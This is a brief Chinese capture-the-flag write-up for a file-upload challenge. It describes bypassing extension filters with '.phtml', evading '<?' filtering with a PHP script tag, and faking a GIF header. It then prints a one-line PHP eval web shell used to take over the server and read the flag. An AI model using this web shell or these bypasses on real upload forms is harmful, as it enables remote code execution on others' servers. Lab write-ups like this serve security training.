## [极客大挑战 2019]Upload
进入靶场:
-
文件上传的题目
-
直接先传个php试试
-
不允许上传PHP
-
尝试多种后缀:
php3\php4\phtml等...
-
发现phtml可以绕过
-
出现新的问题,:规则过滤了我们的
<?
-
试试script能不能绕过去
-
成功绕过后缀名的过滤
-
出现新的问题:
Don't lie to me, it's not image at all!!!
-
看来是单改一个
Content-Type
不行,那么再在文件内容里面加上GIF的头
-
成功执行
phpinfo()
-
上马:
<script language="php">eval($_POST['m0sway']);</script>
-
成功连接
-
根目录下flag文件
GET FLAG ! ! !